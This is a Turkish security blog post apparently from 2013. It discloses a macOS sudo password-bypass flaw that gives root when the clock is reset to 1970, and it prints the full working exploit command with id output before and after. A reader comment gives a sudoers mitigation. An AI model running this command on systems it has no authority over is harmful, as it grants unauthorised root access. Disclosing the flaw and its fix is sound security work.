BGA Security
Blog

MAC OS X Sistemlerde Yetki Yükseltme Açıklığı

  • Kategori: Genel
  • 30 Ağustos 2013

Bir Unix bileşeni olarak bilinen ‘sudo’ uygulamasına ait Parola korumasını bypass eden bir güvenlik açıklığı yayımlanmıştı Mart ayında. Detaylar için bakınız http://www.sudo.ws/sudo/alerts/epoch_ticket.html.

sudo, root haklarıyla uygulama çalışmak için kullanılmaktadır ve çalıştırıldığı zaman parola istemektedir.

Mac OS X sistemler içinde saati 1 Ocak 1970 tarihine geri alarak ‘sudo’ ile  root haklarına parolasız ulaşabileceğiniz bir güvenlik açığı hali hazırda mevcut.

Yerel yetki yükseltme olarak bilinen bu açıklıkdan, 10.7 sürümünden şuan güncel olarak kullanılan 10.8.4 sürümüne kadar tüm Mac OS X sistemlerin etkilendiği rapor edilmiştir.

Metasploit ekibi tarafından açıklığı sömürecek modül yayımlandı, aşağıdaki kaynaklardan detay bilgi edinebilirsiniz.
http://packetstormsecurity.com/files/122965
http://www.rapid7.com/db/modules/exploit/osx/local/sudo_password_bypass

Bu açıklıkdan başarıyla faydalanan saldırgan, sisteminizde root yetkileri ile uzakdan kod/komut çalıştırabilir, Rootkit kurabilir.

Açıklığım Sömürülmesi


Kısıtlı kullanıcı haklarına sahibiz

ozanus:~ ozanucar$ id
uid=501(ozanucar) gid=20(staff) groups=20(staff),502(access_bpf),12(everyone),33(_appstore),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),100(_lpoperator),204(_developer),401(com.apple.access_screensharing)

root yetkilerine yükselmek için aşağıdaki komutu çalıştırmanız yeterli

ozanus:~ ozanucar$ sudo -k;systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su
setUsingNetworkTime: Off
Set TimeZone: GMT
setdate: 01/01/1970
Set Time: 00:00:00

Komut çalıştıkdan sonra tekrar yetkilerinizi sorgularsanız, sorgusuz sualsiz root haklarına kavuştuğunuzu görmüş olucaksınız

sh-3.2# id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),33(_appstore),61(localaccounts),80(admin),98(_lpadmin),100(_lpoperator),204(_developer),401(com.apple.access_screensharing)

Henüz Mac OS X için yayımlanmış bir güncelleme mevcut değil.

Yazar: Ozan UÇAR
ozan.ucar@bga.com.tr

«
»

1 Yorum

  1. Adsız 1 Eylül 2013 15:25

    MacOSX'te acigi kapatmak icin sudo.conf editlemek gerekiyor
    sudo visudo

    Asagidaki satiri eklemeniz yeter…

    Defaults timestamp_timeout=0

Yorum Yaz

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*

CEH Eğitiminde İndirim Fırsatı
Mail listemize üye olarak eğitim fırsatlarını kaçırmayın!
Eğitim ve ücretsiz etkinliklerizden haberdar olmak için e-posta listesimize üye olun!.